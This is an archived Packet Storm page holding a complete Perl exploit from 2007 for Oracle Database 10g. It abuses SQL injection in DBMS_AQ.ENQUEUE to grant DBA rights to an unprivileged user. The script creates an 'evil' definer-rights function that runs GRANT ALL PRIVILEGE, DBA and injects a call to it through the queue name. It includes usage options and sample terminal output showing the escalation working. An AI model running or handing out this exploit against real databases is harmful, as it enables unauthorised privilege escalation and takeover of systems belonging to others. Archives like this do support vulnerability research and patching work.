Lucene search

K
packetstormAndrea PurificatoPACKETSTORM:55538
HistoryApr 02, 2007 - 12:00 a.m.

dbms_aq-enqueue.txt

2007-04-0200:00:00
Andrea Purificato
packetstormsecurity.com
37

0.005 Low

EPSS

Percentile

77.5%

`#!/usr/bin/perl  
#  
# [0-day] Remote Oracle DBMS_AQ.ENQUEUE exploit (10g)  
#  
# Grant or revoke dba permission to unprivileged user  
#   
# Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0"  
#   
# AUTHOR: Andrea "bunker" Purificato  
# http://rawlab.mindcreations.com  
#  
# DATE: Copyright 2007 - Mon Apr 2 11:54:22 CEST 2007  
#   
# PATCH: http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2007.html   
# (CVE-2007-0268 ?)  
#  
#  
# Oracle InstantClient (basic + sdk) required for DBD::Oracle  
#   
#  
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r  
# [-] Wait...  
# [-] Revoking DBA from BUNKER...  
# DBD::Oracle::db do failed: ORA-01951: ROLE 'DBA' not granted to 'BUNKER' (DBD ERROR: OCIStmtExecute) [for Statement "REVOKE DBA FROM BUNKER"] at dbms_aq-enqueue.pl line 95.  
# [-] Done!  
#   
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -g  
# [-] Wait...  
# [-] Creating evil function...  
# [-] Go ...(don't worry about errors)!  
# DBD::Oracle::st execute failed: ORA-25205: the QUEUE BUNKER.'burp' does not exist  
# ORA-06512: at "SYS.DBMS_AQ", line 6  
# ORA-06512: at "SYS.DBMS_AQ", line 215  
# ORA-06512: at line 10 (DBD ERROR: OCIStmtExecute) [for Statement "  
# DECLARE  
# ident VARCHAR2(100);  
# enq_opt dbms_aq.enqueue_options_t;  
# msg_prp dbms_aq.message_properties_t;  
# msgid raw(100);  
# payload raw(100);  
# BEGIN  
# ident := '"'''||BUNKER.own||'''"';  
# dbms_aq.enqueue(ident, enq_opt,msg_prp, payload, msgid);  
# END;  
# "] at dbms_aq-enqueue.pl line 125.  
# [-] YOU GOT THE POWAH!!  
#   
# bunker@fin:~/orasploit$ perl dbms_aq-enqueue.pl -h localhost -s test -u bunker -p **** -r  
# [-] Wait...  
# [-] Revoking DBA from BUNKER...  
# [-] Done!  
#  
  
use warnings;  
use strict;  
use DBI;  
use Getopt::Std;  
use vars qw/ %opt /;  
  
sub usage {  
print <<"USAGE";  
  
Syntax: $0 -h <host> -s <sid> -u <user> -p <passwd> -g|-r [-P <port>]  
  
Options:  
-h <host> target server address  
-s <sid> target sid name  
-u <user> user  
-p <passwd> password   
  
-g|-r (g)rant dba to user | (r)evoke dba from user  
[-P <port> Oracle port]  
  
USAGE  
exit 0  
}  
  
my $opt_string = 'h:s:u:p:grP:';  
getopts($opt_string, \%opt) or &usage;  
&usage if ( !$opt{h} or !$opt{s} or !$opt{u} or !$opt{p} );  
&usage if ( !$opt{g} and !$opt{r} );  
my $user = uc $opt{u};  
  
my $dbh = undef;  
if ($opt{P}) {  
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s};port=$opt{P}", $opt{u}, $opt{p}) or die;  
} else {  
$dbh = DBI->connect("dbi:Oracle:host=$opt{h};sid=$opt{s}", $opt{u}, $opt{p}) or die;  
}  
  
my $sqlcmd = "GRANT ALL PRIVILEGE, DBA TO $user";  
print "[-] Wait...\n";  
  
if ($opt{r}) {  
print "[-] Revoking DBA from $user...\n";  
$sqlcmd = "REVOKE DBA FROM $user";  
$dbh->do( $sqlcmd );  
print "[-] Done!\n";  
$dbh->disconnect;  
exit;  
}  
  
print "[-] Creating evil function...\n";  
$dbh->do( qq{  
CREATE OR REPLACE FUNCTION OWN RETURN VARCHAR   
AUTHID CURRENT_USER AS   
PRAGMA AUTONOMOUS_TRANSACTION;   
BEGIN  
EXECUTE IMMEDIATE '$sqlcmd'; COMMIT;   
RETURN 'burp';  
END;  
} );  
  
print "[-] Go ...(don't worry about errors)!\n";  
my $sth = $dbh->prepare( qq{  
DECLARE  
ident VARCHAR2(100);  
enq_opt dbms_aq.enqueue_options_t;  
msg_prp dbms_aq.message_properties_t;  
msgid raw(100);  
payload raw(100);  
BEGIN  
ident := '"'''||$user.own||'''"';  
dbms_aq.enqueue(ident, enq_opt,msg_prp, payload, msgid);   
END;  
});  
$sth->execute;  
$sth->finish;  
print "[-] YOU GOT THE POWAH!!\n";  
$dbh->disconnect;  
exit;  
`

0.005 Low

EPSS

Percentile

77.5%